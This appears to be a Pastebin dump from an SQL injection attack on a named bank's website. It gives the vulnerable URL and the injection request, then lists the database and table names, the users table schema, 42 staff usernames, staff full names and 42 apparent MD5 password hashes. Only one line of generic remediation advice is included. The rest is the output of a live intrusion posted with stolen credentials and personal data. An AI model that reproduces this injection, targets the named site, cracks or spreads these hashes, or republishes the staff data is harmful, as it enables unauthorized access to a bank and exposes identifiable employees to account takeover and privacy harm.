Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- {*]SQL Injection:
- SQL Injection (SQLI) is a code injection technique that exploits a security vulnerability occurring in the database layer of a web application. The vulnerability was present when user input was either incorrectly filtered for string literal escape characters embedded in SQL statements or user input was not strongly typed and thereby unexpectedly executed.
- solution: Sanitize all user-supplied data before using it as part of database queries.
- database: MySQL
- request:
- GET http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID='%60%22XrojS HTTP/1.1
- database: MySQL
- [*]Vuln on: http://www.islamibankbd.com/branchinfo/branchDetail.php?BrDtlsID=60'
- available databases [2]:
- [*] information_schema
- [*] islamidb
- Database: islamidb
- [74 tables]
- +--------------------------+
- | annualreport |
- | ar_cat |
- | area |
- | articles |
- | atm |
- | atm_area |
- | atm_location |
- | audit_committee |
- | board_of_directors |
- | books |
- | branchdtls |
- | branches |
- | chairman_corner |
- | charge_commision |
- | corporate_info |
- | currencyrate |
- | currencyrate0 |
- | deposit_scheme |
- | deposit_scheme_info |
- | dept |
- | disclosure |
- | district |
- | download |
- | dynamicsections |
- | email |
- | eventdetails |
- | eventdetails_11 |
- | eventdetails_111 |
- | events |
- | executive_committee |
- | feb_aof_info |
- | feb_crsp_info |
- | feb_csc_info |
- | feb_nrb_info |
- | feb_rema_info |
- | feb_repa_info |
- | fex_graph |
- | interview |
- | investment |
- | jobcategory |
- | jobdetails |
- | keypersonal |
- | link |
- | link_cat |
- | management |
- | managementdetails |
- | manager_info |
- | md_corner |
- | md_news |
- | md_publication |
- | news |
- | notice |
- | orderby |
- | orderplacement |
- | paidup_capital |
- | personnel |
- | photo_album |
- | price_sensative_headline |
- | privilege |
- | profit_rate |
- | publication |
- | qryjobs |
- | rds_perform_details |
- | rds_perform_heading |
- | shariahcouncil |
- | shariahdetails |
- | sme_info |
- | sme_prd_info |
- | sme_zone |
- | sponsors |
- | sysvalues |
- | userrights |
- | users |
- | video |
- +--------------------------+
- Database: islamidb
- Table: users
- [13 columns]
- +-------------+--------------+
- | Column | Type |
- +-------------+--------------+
- | Address | varchar(50) |
- | BranchName | varchar(50) |
- | Depertment | varchar(50) |
- | Designation | varchar(50) |
- | Email | varchar(50) |
- | FullName | varchar(50) |
- | IsActive | tinyint(4) |
- | Mobile | varchar(50) |
- | Password | varchar(255) |
- | Phone | varchar(50) |
- | UserID | int(11) |
- | UserName | varchar(50) |
- | UserType | char(1) |
- +-------------+--------------+
- Database: islamidb
- Table: users
- [42 entries]
- +------------------+
- | UserName |
- +------------------+
- | atmadmin |
- | atmimran |
- | bcdadmin |
- | bcdraquib |
- | borhan |
- | bpmdadmin |
- | bpmdnizam |
- | bpmdsaiful |
- | bsadmin |
- | bsahashan |
- | bsfoysal |
- | chairmanadmin |
- | chairmanuser |
- | dsd |
- | ecsdadmin |
- | ecsdjahangir |
- | fadadmin |
- | fadshaheduzzaman |
- | hrdabrar |
- | hrdadmin |
- | hrdahsan |
- | hrdmaquddus |
- | ibwadmin |
- | ibwmonir |
- | ictdwebadmin |
- | khademibw |
- | mdsadmin |
- | mdsmohtasim |
- | mkamal |
- | prdadmin |
- | prdhumayan |
- | rcidadmin |
- | rddadmin |
- | rddmashiul |
- | rddthohid |
- | rdsadmin |
- | rdsuser |
- | shaheduzzaman |
- | shareadmin |
- | sharerozaer |
- | shariahadmin |
- | shariahhabib |
- +------------------+
- Database: islamidb
- Table: users
- [42 entries]
- +-------------------------------+
- | FullName |
- +-------------------------------+
- | Admin of HRD |
- | Ahsan Habib |
- | Habibur Rahman |
- | Humayan Rashid |
- | Imran |
- | Ismail |
- | Jahangir Hossain |
- | Md. Atiqur Rahman khan Khadem |
- | Md. Borhan Uddin |
- | Md. Mashiul Alam |
- | Md. Mostofa Kamal |
- | Mohammd Thohidul Islam |
- | Muhammad Abdul Quddus |
- | Omar Foysal |
- | Qazi Mohammed Shamsul Abrar |
- | Rozaer Hossain |
- | S M Abdur Raquib |
- | Saiful Islam |
- | Shaheduzzaman |
- | Super Admin |
- |_______________________________
- Database: islamidb
- Table: users
- [42 entries]
- +----------------------------------+
- | Password |
- +----------------------------------+
- | 01e8565004e20ebaaee5d1e948cc0f03 |
- | 04dcef1b1d1ffff2a2c1f6f31e42348a |
- | 0d308e5cfbb51143225b884c2d56167e |
- | 0ed377bde3c3a6a3b3c9b8f49c81bcac |
- | 119cbed0296edd3415f73ca21d695eb4 |
- | 13cf6dd79b3e7d7d398f11a567a0a1b5 |
- | 178b0c400e3cbc03418ee64e7af71b6e |
- | 2651cea9b74c51aacdbcc1396ce5bfb7 |
- | 3d3993a6ece38d0c10b155d5facf78e7 |
- | 3eeb8d98c5dba5919eaed3f93bc317e6 |
- | 3fb85c9f03577600bc8ba6e2e25a44d5 |
- | 46f1eeae56bdf1077e1890cf8c8384a3 |
- | 48cda072801bb304a08aaa19cae8ece6 |
- | 4c1f0b5771136bf504f8d72144fc0972 |
- | 5135cebb53ab8a028f9d16d48ca9f5f5 |
- | 6013ee7dc437d4b10b211110ebeb5dc4 |
- | 639aa761eb8cdaaf132c98460c3a92be |
- | 641e4550176313cfcb7004dc6657c54c |
- | 731c4cece807f681524eeb3c00c075c8 |
- | 738a639acd1502c515d2ba9a980162e8 |
- | 7e242f8c51fdb0b1a754bcdec21d0532 |
- | 806938e17a140d0a2847c6d4a7e88e8c |
- | 8336f298fed5901d2c58c4c3a0be0522 |
- | 86d7ffa824672126bd183a8961d95a1e |
- | 8e099fb1fd7804e63e29ca180853f1a3 |
- | 9e044b89f318c8848d18ad0f8a64d309 |
- | 9f6b071e1e1c75a380a99972fd1d6c87 |
- | a06ea6415499e6fc813cdb756da9fdb6 |
- | b31d1d300bd4d9438a59169c08535682 |
- | bd06b23acb9d8f84149500333cc1c7cc |
- | bd596577eefdf3a60b314512035d7de8 |
- | bed407e0a32fdd46b71722c11991d9c3 |
- | cca35a0265721f5ab431821a745056af |
- | d6dec0fde9d68bb607d25b84d45059f0 |
- | da1f2fbf9b96c7160869c785b8de4bd6 |
- | da7c5f47b4c492545aa55ec5887989a1 |
- | db502e13cc0ad9b22440223c095bcdaf |
- | e2e796c8d2f15e6eeae1498e063996d1 |
- | ecdc03a40c52f1a387cb44ddf5740e5d |
- | f099cd5a70853ec7de964fdbb7027bb9 |
- | f28d90f403abe8c509aca6bd73930e8f |
- | f3c94f7cece18ac86ede31265f24a2e7 |
- +----------------------------------+
Add Comment
Please, Sign In to add comment